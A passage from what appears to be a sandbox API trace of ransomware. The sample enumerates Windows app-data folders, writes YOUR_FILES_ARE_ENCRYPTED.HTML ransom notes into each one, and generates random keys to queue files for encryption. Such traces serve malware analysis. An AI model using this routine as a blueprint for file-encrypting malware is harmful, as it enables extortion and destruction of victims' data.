ftCreationTime.dwLowDateTime=0x16a608f5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16a608f5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62e9e8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.471] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.471] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 181 [0120.471] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.471] lstrlenW (lpString=".LOG2") returned 5 [0120.471] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.471] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x16a608f5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16a608f5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62e9e8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.471] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.471] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 186 [0120.471] GetProcessHeap () returned 0x600000 [0120.471] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\microsoft.windowsmaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.472] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.473] CloseHandle (hObject=0x31c) returned 1 [0120.474] GetProcessHeap () returned 0x600000 [0120.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.474] GetProcessHeap () returned 0x600000 [0120.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.474] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169557db, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x169557db, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.474] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.474] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 170 [0120.474] GetProcessHeap () returned 0x600000 [0120.474] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\microsoft.windowsmaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.478] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.479] CloseHandle (hObject=0x324) returned 1 [0120.479] GetProcessHeap () returned 0x600000 [0120.479] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.479] GetProcessHeap () returned 0x600000 [0120.479] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.479] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.479] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.479] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState") returned 97 [0120.479] GetProcessHeap () returned 0x600000 [0120.479] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.479] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState" [0120.479] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\*" [0120.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.480] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.480] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cae82b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cae82b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cae82b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.480] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.480] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0120.480] GetProcessHeap () returned 0x600000 [0120.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.481] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.482] CloseHandle (hObject=0x324) returned 1 [0120.482] GetProcessHeap () returned 0x600000 [0120.482] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.482] GetProcessHeap () returned 0x600000 [0120.482] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.482] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.482] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.482] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings") returned 93 [0120.482] GetProcessHeap () returned 0x600000 [0120.482] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.482] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings" [0120.482] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\*" [0120.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.482] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.482] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13d6d4aa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13d6d4aa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.482] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.482] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 106 [0120.482] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.482] lstrlenW (lpString=".lock") returned 5 [0120.482] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.482] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.482] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.483] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat") returned 106 [0120.483] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.483] lstrlenW (lpString=".dat") returned 4 [0120.483] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.483] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.488] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.488] GetProcessHeap () returned 0x600000 [0120.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.490] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="36") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="1E") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="D5") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="6B") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B4") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="3E") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="7B") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="93") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="CD") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="BF") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="8E") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="BA") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="30") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="C5") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="F1") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="64") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="52") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="27") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="3E") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="29") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D5") returned 2 [0120.491] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="5D") returned 2 [0120.491] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="11") returned 2 [0120.491] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="59") returned 2 [0120.491] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="8B") returned 2 [0120.491] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="2D") returned 2 [0120.491] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="5A") returned 2 [0120.491] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="3E") returned 2 [0120.491] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="3C") returned 2 [0120.491] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="7F") returned 2 [0120.491] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="55") returned 2 [0120.491] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="24") returned 2 [0120.492] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.492] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.492] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.492] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0120.492] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.492] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.492] GetProcessHeap () returned 0x600000 [0120.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.493] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.494] CloseHandle (hObject=0x324) returned 1 [0120.494] GetProcessHeap () returned 0x600000 [0120.494] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.494] GetProcessHeap () returned 0x600000 [0120.494] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cd4a2e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.494] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.494] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData") returned 98 [0120.494] GetProcessHeap () returned 0x600000 [0120.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.494] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData" [0120.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\*" [0120.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13cd4a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13cd4a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13cd4a2e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 